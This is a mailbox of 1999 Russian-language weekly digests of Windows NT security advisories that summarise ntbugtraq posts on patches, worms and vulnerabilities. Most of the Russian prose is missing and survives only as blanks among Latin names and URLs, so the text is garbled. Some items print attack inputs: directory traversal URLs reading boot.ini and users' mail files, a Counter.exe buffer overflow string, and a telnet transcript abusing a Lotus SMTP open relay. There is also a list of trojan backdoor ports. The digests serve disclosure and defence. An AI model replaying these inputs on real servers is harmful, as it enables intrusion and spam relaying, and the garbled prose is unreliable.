  IE 5.0:     IE,     
    (    /), 
      .

 


        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.   SP5,   


Aleph One [mailto:aleph1@UNDERGROUND.ORG] (ntbugtraq)  
,   SP5     .

Q188348 Specially-Malformed FTP Requests May Create Denial of Service
http://support.microsoft.com/support/kb/articles/Q188/3/48.asp

Q193361 MSGINA.DLL does not Reset WINLOGON Structure
http://support.microsoft.com/support/kb/articles/Q193/3/61.asp

Q195733 Denial of Service in Applications Using RPC over Named Pipes
http://support.microsoft.com/support/kb/articles/Q195/7/33.asp

Q214802 WinNT Lets You Paste Text into Unlock Workstation Dialog Box
http://support.microsoft.com/support/kb/articles/Q214/8/02.asp

Q214840 MSV1_0 Allows Network Connections for Specific Accounts
http://support.microsoft.com/support/kb/articles/Q214/8/40.asp

Q218473 Restricting Changes to Base System Objects
http://support.microsoft.com/support/kb/articles/Q218/4/73.asp

Q221991 Screen Saver Vulnerability Lets User Privileges Be Elevated
http://support.microsoft.com/support/kb/articles/Q221/9/91.asp

2. IE 5.0  Outlook '98

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
    

1. NT 4.0
2. SP4
3. IE 5.0
4. Outlook '98

   Outlook '98  .

zzIML-NTBugTraq <IML-NTBugTraq@VNW.COM> ,   
     

[HKEY_CURRENT_USER\Software\Microsoft\Windows \
    CurrentVersion\Internet Settings\Zones\1]
  "1004"=dword:00000000

   

Q182569
 "Description of Internet Explorer Security Zones Registry Entries"
 http://support.microsoft.com/support/kb/articles/q182/5/69.asp

3.   winhlp32.exe

Russ <Russ.Cooper@RC.ON.CA>      
,    winhlp32.exe,  Mnemonix. 
       .cnt,    
   winhlp32.exe,      
 .

http://www.microsoft.com/security/bulletins/ms99-015.asp
http://support.microsoft.com/support/kb/articles/q231/6/05.asp
http://ntbugtraq.ntadvice.com/ntfixes.asp

4.     
 RAS

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
,       
 RAS

http://www.microsoft.com/security/bulletins/ms99-016.asp

    Mnemonix 
<mnemonix@GLOBALNET.CO.UK>       

http://www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.

5. IIS 4.0 FTP

"Katz-Braunschweig, Daniel" <DKatz@IONA.EDU> (ntbugtraq) , 
 FTP-  IIS 4.0     delete.  
   

Q194394 - http://support.microsoft.com/support/kb/articles/q194/3/94.asp

6. Counter.exe 2.70

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) 
(http://www.infowar.co.uk/mnemonix, http://www.arca.com)   
   Counter.exe,     
  -.    

http://no-such-server-really/scripts/counter.exe?%0A
http://no-such-server-really/scripts/counter.exe?AAAA.. ( 2200 A)

  .

7. Windows 95    
Execute

"J. B. Cattley" <jbc@IHUG.COM.AU> (ntbugtraq) ,    NT 
         
Execute (, RWDPO),        
Windows 95   - .

8. Site Server

"Mark" <mark@ntshop.net> (ntsecurity, iss)    
.   Site Server   
 AdSamples,    Ad Server. 
      ,    
   SITE.CSC,      
 SQL.    

http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm

9. ,    
" "

Joakim von Braun <joakim.von.braun@risab.se> (ntsecurity, iss)  
 ,      


port       21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
                    WinCrash
port       23 - Tiny Telnet Server
port       25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
                    Stealth, Terminator, WinPC, WinSpy
port       31 - Hackers Paradise
port       80 - Executor
port     456 - Hackers Paradise
port     555 - Ini-Killer, Phase Zero, Stealth Spy
port     666 - Satanz Backdoor
port   1001 - Silencer, WebEx
port   1011 - Doly Trojan
port   1170 - Psyber Stream Server, Voice
port   1234 - Ultors Trojan
port   1245 - VooDoo Doll
port   1492 - FTP99CMP
port   1600 - Shivka-Burka
port   1807 - SpySender
port   1981 - Shockrave
port   1999 - BackDoor
port   2001 - Trojan Cow
port   2023 - Ripper
port   2115 - Bugs
port   2140 - Deep Throat, The Invasor
port   2801 - Phineas Phucker
port   3024 - WinCrash
port   3129 - Masters Paradise
port   3150 - Deep Throat, The Invasor
port   3700 - Portal of Doom
port   4092 - WinCrash
port   4590 - ICQTrojan
port   5000 - Sockets de Troie
port   5001 - Sockets de Troie
port   5321 - Firehotcker
port   5400 - Blade Runner
port   5401 - Blade Runner
port   5402 - Blade Runner
port   5569 - Robo-Hack
port   5742 - WinCrash
port   6670 - DeepThroat
port   6771 - DeepThroat
port   6969 - GateCrasher, Priority
port   7000 - Remote Grab
port   7300 - NetMonitor
port   7301 - NetMonitor
port   7306 - NetMonitor
port   7307 - NetMonitor
port   7308 - NetMonitor
port   7789 - ICKiller
port   9872 - Portal of Doom
port   9873 - Portal of Doom
port   9874 - Portal of Doom
port   9875 - Portal of Doom
port   9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack=B499 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil

   http://www.simovits.com/nyheter9902.html.

10.     
 

Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq) ,  
- Alibaba 2.0    
http://www.server.se/../../winnt/.

Bob Duffett <Bob.Duffett@CCC.UAB.EDU> (ntbugtraq) ,  
InoculateIT 4.53 Real-Time Exchange Scanner     
 ,    inbox. ,  
      ,    
 .

Arne Vidstrom (ntbugtraq)     BisonWare FTP Server 
3.5.    ,      4.1. 



From rudnyi Sun May 30 16:57:19 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id QAA24812
	for rudnyi@comp.chem.msu.su; Sun, 30 May 1999 16:57:18 +0400 (MSD)
Date: Sun, 30 May 1999 16:57:18 +0400 (MSD)
Message-Id: <199905301257.QAA24812@comp.chem.msu.su>
Subject: digest 21-27.05.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

21 - 27  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.     
Winhlp32.exe

Mnemonix <mnemonix@GLOBALNET.CO.UK> 
http://www.infowar.co.uk/mnemonix, http://www.arca.com (ntbugtraq) 
(ntsecurity, iss)   ,      
Winhlp32.exe.    ,    
 wordpad.cnt,    Winhlp32    
  add.bat.      

http://www.infowar.co.uk/mnemonix/winhlpadd.exe

,       , 
  .

http://www.microsoft.com/security/bulletins/ms99-015.asp
http://support.microsoft.com/support/kb/articles/q231/6/05.asp

2. NT ODBC

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
[WireTrip] rfp@wiretrip.net,      NT ODBC.

http://www.geek-girl.com/bugtraq/1999_2/0544.html

 Russ ,  - MDAC 2.1   
.

http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm

 "Jesper M. Johansson" <jesper.m.johansson-1@UMN.EDU> 
(ntbugtraq) ,  MDAC 2.1     
Excel (Excel data sources).

3.  RAS  RRAS

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
 ,    RAS  RRAS,  
        "Save this Password".

http://www.microsoft.com/security/bulletins/ms99-017.asp

RAS
http://support.microsoft.com/support/kb/articles/q230/6/81.asp

RRAS
http://support.microsoft.com/support/kb/articles/q233/3/03.asp

4.  0xc000021a  Winlogon

Clark Lebarge <LClark@HEINZE-INSTITUTE.COM> (ntbugtraq) ,  
      Winlogon.   
    Addusers.exe  Resource Kit, 
       .CSV.  
    ,    Connect To:  
    .    ,    
      0xc000021a.

5.     SP4

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    
,       
  .

http://support.microsoft.com/support/kb/articles/q170/0/78.asp

Aaron Wood <awood@CS.WASHINGTON.EDU>      


http://support.microsoft.com/support/kb/articles/q195/5/09.asp

6.     
 

ARCNT <ARCNT@CAI.COM> (ntbugtraq) ,    
  InocuLAN v4.0 build 373  375 
(http://support.cai.com/Download/patches/inocnt.html).

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   Thomas Krug,  
 ,    IBM Netfinity Remote Control 
Software    regedit.exe  musrmgr.exe  
   .   IBM 
  .

cmart <cmart@MAIL.STATICUSERS.NET> http://winntsec.com, (ntbugtraq) 
       SmartDesk WebSuite v2.1. 
      .

Marc <Marc@EEYE.COM>, http://www.eEye.com (ntbugtraq) (ntsecurity, iss) 
,    ,    
 - (web based interface), , CMail 2.3, FTGate 
2,1,2,1, NTMail 4.20,   .    


http://[server]:8002/../spool/username/mail.txt
http://[server]:8080/../newuser.txt
http://[server]:8000/../../../../../boot.ini.

     
  . John Stanners <john.stanners@NTMAIL.CO.UK> , 
      NTMail 4.3.


From rudnyi Sun Jun  6 23:18:07 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id XAA11893
	for rudnyi@comp.chem.msu.su; Sun, 6 Jun 1999 23:18:06 +0400 (MSD)
Date: Sun, 6 Jun 1999 23:18:06 +0400 (MSD)
Message-Id: <199906061918.XAA11893@comp.chem.msu.su>
Subject: digest 28.05-3.6.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

28  - 3  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1. SP5   *.idc

Scott Danahy <SDanahy@DOCE.LSU.EDU> (ntbugtraq) ,  SP5 
    IIS  .idc ,   Q193689 

http://support.microsoft.com//support/kb/articles/Q193/6/89.asp

 SP4   .     
  .

2.   

Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq) ,   
        ,  
     ,   
    .     ,    
 -      ,    
  .

3. ActivePerl 516

Michael Smith <support@ACTIVESTATE.COM> (ntbugtraq) ,  
PerlScript  Perl-ISAPI,    ActivePerl 516,  
     open(),     
 IIS.  -    ActivePerl 517,  
       
 , ,

$filename = substr $filename, 0, 255;
open FOO, ">$filename";

4.     
 

Chris Radigan <radigac@CERF.NET> (ntbugtraq) ,   
 PC Anywhere,     5631  200  
 .  Symantec   
(aw32tcp.dll),     .

Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq)    
Broker FTP Server v. 3.0 Build 1,       
, , LIST ..\..\winnt\.

Ed Walsh <walsh@BWATER.COM> (ntbugtraq) ,    
http://www.economist.com/      
 IE.  -    .

******************************************
   Sunbelt - http://www.sunbelt-software.com/

  ,     
(  ) - http://www.wrox.com/

  ,  SQL - http://www.sqlmag.com

PAUL MARITZ        Windows 
2000     .



From rudnyi Mon Jun 14 09:48:11 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id JAA02252
	for rudnyi@comp.chem.msu.su; Mon, 14 Jun 1999 09:48:11 +0400 (MSD)
Date: Mon, 14 Jun 1999 09:48:11 +0400 (MSD)
Message-Id: <199906140548.JAA02252@comp.chem.msu.su>
Subject: digest 4-10.6.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

4 - 10  1999 

   training.ru

<          
>.

-  Training.ru    
    www.training.ru.

          
.    ,   :

.     10%  .  
 ,        
,   <>. 

.  ,   e-mail,  
         
.        
 9  1999 .

         
     .



        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.   ,   
 

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   NAI  
Trend Micro  ,    .

 : W32/Pretty.Park, : Pretty.Worm.   
Windows 9x/NT.         
FILES32.VXD  WINDOWS\SYSTEM     
 FILES32.VXD   Windows,   exe-.

HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command

        exe-  .

     ,    
.      IRC     
 .

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
,     

--------
Hi  !
I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs.
bye.
 <<zipped_files.exe>>
---------

    exe-.    
  

http://www.symantec.com/avcenter/venc/data/worm.explore.zip.html
http://www.cert.org/advisories/CA-99-06-explorezip.html

     \WINNT\System32\   Explore.exe 
    

[HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\
CurrentVersion\Windows
run= C:\WINNT\System32\explore.exe.

2. IE 5.0  HTA

"Noller, Jesse" <Jesse.Noller@STAPLES.COM> (ntbugtraq) ,  
IE5    HTML (HTML Applications, HTA). 
     Internet Explorer  
  ,         
    ,    HTA   
.

   ,     
        
.

3. Compaq Webadmin

"Andrew Kunz" <kunza@tdbank.ca> (ntsecurity, iss)    
 Compaq,     Compaq 
Management Agents 4.0  Compaq Survey Utility 2.0      
-.      .

4.     
 

"Geo." <georger@NLS.NET> (ntbugtraq) ,   NTMail 
 3.x     (relay),    
    (spam).  -    
NTMail 4.



From rudnyi Mon Jun 21 09:22:18 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id JAA08190
	for rudnyi@comp.chem.msu.su; Mon, 21 Jun 1999 09:22:18 +0400 (MSD)
Date: Mon, 21 Jun 1999 09:22:18 +0400 (MSD)
Message-Id: <199906210522.JAA08190@comp.chem.msu.su>
Subject: digest 11-17.6.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

11 - 17  1999 

 

Date: Sat, 19 Jun 1999 09:28:08 +0400
From: Andrey Kolishak <andr@sandy.ru>

  ,      ,    
 http://www.chat.ru/~vadim_proskurin/  
 "     Windows
NT" http://www.chat.ru/~vadim_proskurin/admintrap.htm,  
 Named Pipe   2  ,   
     NT   
    .


        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.    IIS 4

eEye - Digital Security Team <eeye@EEYE.COM> (ntbugtraq) (ntsecurity, iss) 
   IIS 4.0,    .  
       IIS. 
   ISM.DLL,       
   .HTR.

 -   .HTR   ISAPI IIS 4.0.

          
IIS

http://microsoft.com/security/products/iis/CheckList.asp

     

http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html

,    ,   


http://www.eeye.com/database/advisories/ad06081999/ad06081999-
exploit.html

 

http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
   

http://www.microsoft.com/security/bulletins/ms99-019.asp.

    .    
   

http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=38

2. Worm.ExploreZip Killer

James Strompolis <jimst@ENTERACT.COM> (ntbugtraq)   
 

http://www.fastlanetech.com/worm_killer.htm

3. Secure Attention Screen

Ben Ryan <ben@bssc.edu.au> (ntbugtraq) ,    
        CTRL-ALT-DEL,  
   CTRL-ALT-ESC-DEL   .

Jarod Jenson <jjenson@ECT.ENRON.COM> (ntbugtraq) ,   
           
  ,      
          
undo.

4.   

Jacques Forster <Jacques.Forster@DIGITAL.COM> (ntbugtraq) ,  
    "Restrict access to registry tools", 
  ,      
  .reg.       regedit, 
       
.

Ryan Russell <Ryan.Russell@SYBASE.COM> (ntbugtraq) ,  
     ,   
 .

5.    NT    
 

Dustin Dykes <wirefall@hotmail.com> (ntsecurity, iss)    
,        NT    
 .

  
http://support.microsoft.com/support/kb/articles/Q176/8/20.asp

Remote Access  Routing
http://support.microsoft.com/support/kb/articles/q169/8/95.asp

6. Lotus Notes Relay

Robert Lister <robl@LENTIL.ORG> (ntbugtraq) ,   
   (relay)  Lotus SMTP MTA ( 
 v4.6.4).

telnet server 25
Connected to 192.168.100.1.
Escape character is '^]'.
220 company.com Lotus SMTP MTA Service Ready
HELO some.domain
250 company.com
MAIL FROM:<>
250 OK
RCPT TO:<recipient%remote.domain.net@company.com>
250 OK
DATA
From: ... etc

whaterver you like..


From rudnyi Mon Jun 28 09:45:15 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id JAA03277
	for rudnyi@comp.chem.msu.su; Mon, 28 Jun 1999 09:45:14 +0400 (MSD)
Date: Mon, 28 Jun 1999 09:45:14 +0400 (MSD)
Message-Id: <199906280545.JAA03277@comp.chem.msu.su>
Subject: digest 18-24.6.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

18 - 24  1999 

   Training.ru

   ,   1  1999  Microsoft  
      .  
:

  - 30 
  (beta-tests) - 30 
 MCT - 30 
 MSS (Microsoft Sales Specialist) - 20 

    1    ,   
   Web- (http://training.ru/testing/).   
    info@training.ru    
(095) 115-6001.



        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.  Phantom

Adam Shostack <adam@NETECT.COM> (ntbugtraq) ,   
       LSA. , 
-,       
 LsaLookupNames.      
.

  ,    (MS99-
20)  

http://www.microsoft.com/security/bulletins/ms99-020.asp

http://support.microsoft.com/support/kb/articles/q231/4/57.asp

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-
postSP5/LSA3-fix/

2. CSRSS DoS

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     


<http://www.microsoft.com/security/bulletins/ms99-021faq.asp>

    CSRSS (Client/Server Runtime 
SubSystem)  Win32.       
  "  ".

3. Performance Monitor

Bruno.Zumella@LAFARGE_CIMENTS.LAFARGE.COM (ntbugtraq) , 
     Performance Monitor (  
 SP5)       
    .

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/Hotfixes-
PostSP5/Perfctrs-fix

4. Office 97   NT

Jay Shephard <JShephard@FOXSPORTS.NET> (ntbugtraq)  , 
      NT   
Office 97.    ,     Office 97 
    read/write   system32 (KB 
Q169387). 

Silona Bonewald <Silona@SILONA.COM> ,    
 ,    Users(RWX)(RWXD)  system32, 
 users(RX)       .

Paul Leach <paulle@MICROSOFT.COM> (ntbugtraq) ,   Office 
2000      .

5.  ODBC

"Schimanski, Michael" <Michael.Schimanski@PROGTECH.NET> (ntbugtraq) 
  ,     
    ODBC   Data Access 
Components (MDAC) 2.0 SP1    Proxy Server 2.0.  
   Q196444,  ,      
  .  SP5  .  
    .

Damien Daspit <Damien@BRYAN.EDU> (ntbugtraq) ,    
    .      
     mspadmin.exe,  
  .   ,   Q196444  
     Proxy Server 2.0.

6.   Outlook

Anders Janson <anders.janson@ABNAMRO-SOFTWARE.COM> (ntbugtraq) 
,      Outlook 97/98/2000, 
      .

http://officeupdate.microsoft.com/downloadDetails/O97attch.htm
http://officeupdate.microsoft.com/downloadDetails/O98attch.htm
http://officeupdate.microsoft.com/2000/downloadDetails/O2Kattch.htm

        .com, 
.bat  .exe   ,      
 .

7. PGP  Microsoft Exchange

"Jay D. Dyson" <jdyson@TECHREPORTS.JPL.NASA.GOV> (ntbugtraq) 
,        ASCII 
RADIX-64 Exchange   ,   
   , ,   ,   
  .  -   
    .

8.     
 

Paul Wylie <pwylie@SSSC.COM> (ntbugtraq) ,  Eastman 
Software's Work Management 3.21        
(HKLM\Software\Kodak\Eastman Software Work Management\3.2\ODA).


**********************************
   Sunbelt, http://www.sunbelt-software.com

  Linux 2.2, NT4.0, NetWare 5.0  Solaris 7.0  


http://www.zdnet.com/pcweek/stories/jumps/0,4270,2254356,00.html

SoundView Technology Group      
.    .

                                             
Anti-virus products      93%       6%         1%
Authentication tokens    36%       32%        32%
Firewall (Internet)      89%       10%        1%
Firewall (Intranet)      57%       24%        19% 
Intrusion Detection      26%       56%        18%
VPN                      29%       52%        19%
Single Sign-On           4%        49%        47%
Smart Cards              11%       29%        60%

 - ,  -   ,  -   
.

         
http://www.cramsession.com/



From rudnyi Mon Jul  5 17:29:36 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA03864
	for rudnyi@comp.chem.msu.su; Mon, 5 Jul 1999 17:29:35 +0400 (MSD)
Date: Mon, 5 Jul 1999 17:29:35 +0400 (MSD)
Message-Id: <199907051329.RAA03864@comp.chem.msu.su>
Subject: digest 25.6-1.7.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

25  - 1  1999 

   Training.ru

     ,   
,   

http://training.ru/security/Library/MSSB/


        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.     

Martin Wolf <martinw@INFOSUPPORT.COM> (ntbugtraq) ,  
NT (    SP4)   
 (NDDEAGNT.EXE, EXPLORER.EXE, USERINIT.EXE  
TASKMGR.EXE)     ,    
. .

1)    (CALC.EXE)   .
2)    NDDEAGNT.EXE.
3)        .
4)        
.

     " ",  
   Write     .

      ,   
    Write     .

2.  NDIS.SYS  SP5

"Ashley M. Kirchner" <ashley@PCRAFT.COM> (ntbugtraq)  , 
  SP5    .   SP5  
   Mac-  NT4 Server   
       ndis.sys.   SP3 
 SP4,    .



From rudnyi Mon Jul 12 17:17:59 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA21352
	for rudnyi@comp.chem.msu.su; Mon, 12 Jul 1999 17:17:59 +0400 (MSD)
Date: Mon, 12 Jul 1999 17:17:59 +0400 (MSD)
Message-Id: <199907121317.RAA21352@comp.chem.msu.su>
Subject: digest 2-8.7.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

2 - 8  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

     ,   
,   

http://training.ru/security/Library/MSSB/

1.     

   Martin Wolf <martinw@INFOSUPPORT.COM> 
(ntbugtraq) ,  NT   explorer.exe  .  
   .     ,  NT 
        ( 
  User Manager),      
      . ,  
    :   
    explorer.exe, nddeagnt.exe, 
taskmgr.exe  userinit.exe,  NT      
,    \winnt\system32.

2.   SSL

McAllister James A <mcallister.ja@MELLON.COM> (ntbugtraq) , 
     SSL,    
 .    

http://www.rsa.com/rsalabs/pkcs1/
http://www.bell-labs.com/news/1998/june/26/1.html

Netscape   .

Karim Alim <karim.alim@CWUSA.COM> (ntbugtraq) ,  
     .

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-po
stSP3/ssl-fix/Q148427.TXT
http://www.microsoft.com/security/bulletins/ms98-002.asp

3.  IOCTL

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
 ,  IOCTL.

http://www.microsoft.com/security/bulletins/MS99-024faq.asp
http://support.microsoft.com/support/kb/articles/q236/3/59.asp

   IOCTL    
.     ,    
   ,       
 .      Terminal Server.

4. Back Orifice 2000

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
     Back Orifice. ,   
    .  Back Orifice  
   NT.    .

http://ntbugtraq.ntadvice.com/bo2000.asp
http://www.bo2k.com/
http://www.msnbc.com/news/287542.asp
http://www.entmag.com/breaknews.asp?ID=1013

O'Neil Brooke <o'neil.brooke@lmco.com>    .

http://www.kcl.ac.uk/orgs/icsa/rusi.htm
http://www.rand.org/publications/RRR/RRR.fall95.cyber/cyberwar.html
http://www.us.net/signal/Archive/June99/information-june.html
http://www.rand.org/publications/RRR/RRR.fall95.cyber/infor_war.html
http://www.trojanslair.com/
http://www.onelist.com/searchlist.cgi?searchval=back+orifice
http://xforce.iss.net/alerts/advise30.php3

5.   Netscape Enterprise Server

Arne Vidstrom <winnt@BAHNHOF.SE> (ntbugtraq)    
   SSL  Netscape Enterprise Server,   
       . Netscape 
    

http://help.netscape.com/business/filelib.html#SSLHandshake

6.     IE5

Ed Sparks <ed.sparks@matrikon.com> (ntbugtraq) ,    
IE5   SP5,   SP5.    
    .    ,  
  IE5    ENHSIG.DLL,, 
 SP5.

7. URL    

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
,  IE4  IE5  URL     
(authenticated URL)   ,    
   .     , 
           
HTML       - . 
 , -       
  ,   .   
      IE.



From rudnyi Mon Jul 19 11:18:40 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id LAA27574
	for rudnyi@comp.chem.msu.su; Mon, 19 Jul 1999 11:18:39 +0400 (MSD)
Date: Mon, 19 Jul 1999 11:18:39 +0400 (MSD)
Message-Id: <199907190718.LAA27574@comp.chem.msu.su>
Subject: digest 9-15.7.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

9 - 15  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.  DCOM

David LeBlanc <dleblanc@MINDSPRING.COM> (ntbugtraq)  
     DCOM.

       ISS.  
      .    
      (www.iss.net).

        Win32 SDK.

   dcomcnfg     
.

       MSJ (Microsoft Systems Journal).   
    .

  ,  COM  DCOM    
 .      IIS-,   
ASP-       .

2. SP5  RRAS

DRBivens@AGST.COM (ntbugtraq) ,    SP5 
  RRAS.    Event 20023 
("Remote Access Server Security Failure. The security agent has rejected the 
Remote Access server's request to start the service on this computer on LANA 
x")  Event 20081 ("Remote Access Server Security Failure.  Could not reset 
lana x (the error code is the data).  Security check not performed"),.

3.  MS OLEDB

veiled aspect <veiled_aspect@HOTMAIL.COM> (ntbugtraq) ,   
 MS OLEDB (data link),     ADO 2.0, 
          .

4.     Outlook

Nagaraj Bhat [mailto:nsbhat@globalnoise.com] (ntsecurity, iss) ,  
       Outlook. 

"Larry Osterman \(Exchange\)" <larryo@exchange.microsoft.com> (ntsecurity, 
iss)   .

 Tools/Services    Exchange Server. 
     (logon security)   
Advanced  "none".    ,  Outlook   
   ,      "change password".  
        Windows/NT security.

5. Back Orifice 2000

 X-Force <xforce@iss.net> (ntsecurity, iss)   
,   Back Orifice 2000.  
   http://xforce.iss.net/.

  Back Orifice 2000     
Windows   UMGR32.EXE.  NT    
   "Remote Administration Service."   
      .



From rudnyi Mon Aug  2 14:19:48 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id OAA01301
	for rudnyi@comp.chem.msu.su; Mon, 2 Aug 1999 14:19:47 +0400 (MSD)
Date: Mon, 2 Aug 1999 14:19:47 +0400 (MSD)
Message-Id: <199908021019.OAA01301@comp.chem.msu.su>
Subject: digest 16-29.7.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   Training.ru

   http://training.ru/security/     
security@training.ru

16 - 29  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://training.ru/security/).

1.  RDS

Greg Gonzalez <ghg@INTERCERVE.COM> (ntbugtraq)   
  RDS.     

http://www.microsoft.com/security/bulletins/ms98-004.asp

  ,       
Shell,    IIS 3.0  4.0  MDAC 1.5.   
,          
.         
 .          .  
   ,   

http://www.microsoft.com/security/bulletins/ms99-025.asp

 -  RDS,       /msadc,  
  (http://www.microsoft.com/Data/ado/rds/custhand.htm).

  ,     MDAC 2.0  2.1 
 ,        


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\
Parameters\ADCLaunch\RDSServer.DataFactory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\
Parameters\ADCLaunch\AdvancedDataFactory
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\
Parameters\ADCLaunch\VbBusObj.VbBusObjCls

     

http://www.geek-girl.com/bugtraq/1999_2/0544.html

 Q165297.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
      , 
          
 IIS   SYSTEM.      
 .

http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=47

 .      

http://training.ru/security/Library/MSSB/

".rain.forest.puppy." <rfp@WIRETRIP.NET> (ntbugtraq)   
     Perl,  RDS.     
 www.ntbugtraq.com  www.technotronic.com/rfp/

2.    Phone Dialer 
   

Mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) ,  
 Microsoft's Phone Dialer  ,   
 .       
